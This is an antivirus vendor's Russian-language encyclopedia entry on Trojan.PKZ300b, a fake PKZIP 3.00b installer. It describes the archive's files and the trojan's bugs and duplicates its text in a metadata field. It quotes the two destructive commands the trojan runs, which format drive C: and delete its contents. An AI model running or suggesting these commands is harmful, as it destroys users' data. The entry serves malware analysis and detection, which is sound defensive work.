Kaspersky Threats

Класс

Платформа

Описание

Technical Details

Представляет из себя self-extracting (Zip2Exe) архив с именем PKZ300B.EXE и
длиной 178981 байт. Внутри архива — 5 файлов:

имя файла       длина   что внутри
---------       -----   ----------
PKZINST.EXE      5328   сам троянец
WHATSNEW.300     2417   WhatsNew из PkZip 2.04c, все строки "2.04c"
заменены на "3.0"
COMPRESS.000   124005   ARJ 2.41, плюс экстра-данные
COMPRESS.001   116260   ARJ 2.41 сам по себе
FILE_ID.DIZ       101   DOC-файл, говорит про этот архив, что он -
Pkzip 3.00b.

Троянцем является единственный файл — PKZINST.EXE. Hаписан он на
TurboPascal. При запуске выводит текст:

PKZIP (R) Install Utility   Version 3.00b  4-05-950
Copr. 1989-1995 Pkware Inc. All Rights Reserved.
Pkzip Reg. U.S. Pat. and Tm. Off.

Initializing, this may take a few minutes....

и выполняет две команды:

COMMAND.COM /C Format c: > NULL
COMMAND.COM /C deltree /y c: > NULL

К счастью, автору троянца не хватило ума сделать троянца без ошибок, и
троянец затыкается на первой же команде — DOS ждет ответа на стандартный
запрос:

WARNING: ALL DATA ON NON-REMOVABLE DISK
DRIVE C: WILL BE LOST!
Proceed with Format (Y/N)?

Причем самого этого запроса на экране не видно. Hе дай бог, конечно же,
нажать «Y» или «N». Если «Y», то пойдет формат диска C:, если «N», то
пойдет работать DELTREE.
Однако естественное желание при виде заснувшей программы — нажать Reset или
Ctrl-C/Break. В обоих случаях троянец отрубается безо всякой потери данных,
а если выход произошел по Ctrl-C, то он еще вякнет напоследок:

Thanks for waiting, moron. You shouldn't have fucked with us.

и вываливается в DOS.
Так что, благодаря этой ошибке юзер может спать спокойно и не бояться новых
версий PKZip. Плюс к тому: в троянце есть еще одна ошибка. Перенаправление
«> NULL» создает на диске файл NULL, а автор троянца видимо, хотел
отключить посторонний вывод на экран перенаправлением «> NUL».
Судя по всему сие [юное] дарование читает DOS User’s Guide и еще не дошло
до буквы ‘N’ в алфавитном списке команд DOS.
AVP ловит этого троянца под именем «Trojan.PKZ300b» как в распакованном
файле, так и в self-extracting архиве.

Узнай статистику распространения угроз в твоем регионе

Класс	Trojan
Платформа	Win32
Описание	Technical Details Представляет из себя self-extracting (Zip2Exe) архив с именем PKZ300B.EXE и длиной 178981 байт. Внутри архива — 5 файлов: имя файла длина что внутри --------- ----- ---------- PKZINST.EXE 5328 сам троянец WHATSNEW.300 2417 WhatsNew из PkZip 2.04c, все строки "2.04c" заменены на "3.0" COMPRESS.000 124005 ARJ 2.41, плюс экстра-данные COMPRESS.001 116260 ARJ 2.41 сам по себе FILE_ID.DIZ 101 DOC-файл, говорит про этот архив, что он - Pkzip 3.00b. Троянцем является единственный файл — PKZINST.EXE. Hаписан он на TurboPascal. При запуске выводит текст: PKZIP (R) Install Utility Version 3.00b 4-05-950 Copr. 1989-1995 Pkware Inc. All Rights Reserved. Pkzip Reg. U.S. Pat. and Tm. Off. Initializing, this may take a few minutes.... и выполняет две команды: COMMAND.COM /C Format c: > NULL COMMAND.COM /C deltree /y c: > NULL К счастью, автору троянца не хватило ума сделать троянца без ошибок, и троянец затыкается на первой же команде — DOS ждет ответа на стандартный запрос: WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proceed with Format (Y/N)? Причем самого этого запроса на экране не видно. Hе дай бог, конечно же, нажать «Y» или «N». Если «Y», то пойдет формат диска C:, если «N», то пойдет работать DELTREE. Однако естественное желание при виде заснувшей программы — нажать Reset или Ctrl-C/Break. В обоих случаях троянец отрубается безо всякой потери данных, а если выход произошел по Ctrl-C, то он еще вякнет напоследок: Thanks for waiting, moron. You shouldn't have fucked with us. и вываливается в DOS. Так что, благодаря этой ошибке юзер может спать спокойно и не бояться новых версий PKZip. Плюс к тому: в троянце есть еще одна ошибка. Перенаправление «> NULL» создает на диске файл NULL, а автор троянца видимо, хотел отключить посторонний вывод на экран перенаправлением «> NUL». Судя по всему сие [юное] дарование читает DOS User’s Guide и еще не дошло до буквы ‘N’ в алфавитном списке команд DOS. AVP ловит этого троянца под именем «Trojan.PKZ300b» как в распакованном файле, так и в self-extracting архиве.
	Узнай статистику распространения угроз в твоем регионе

Trojan.Win32.PKZ300b

Technical Details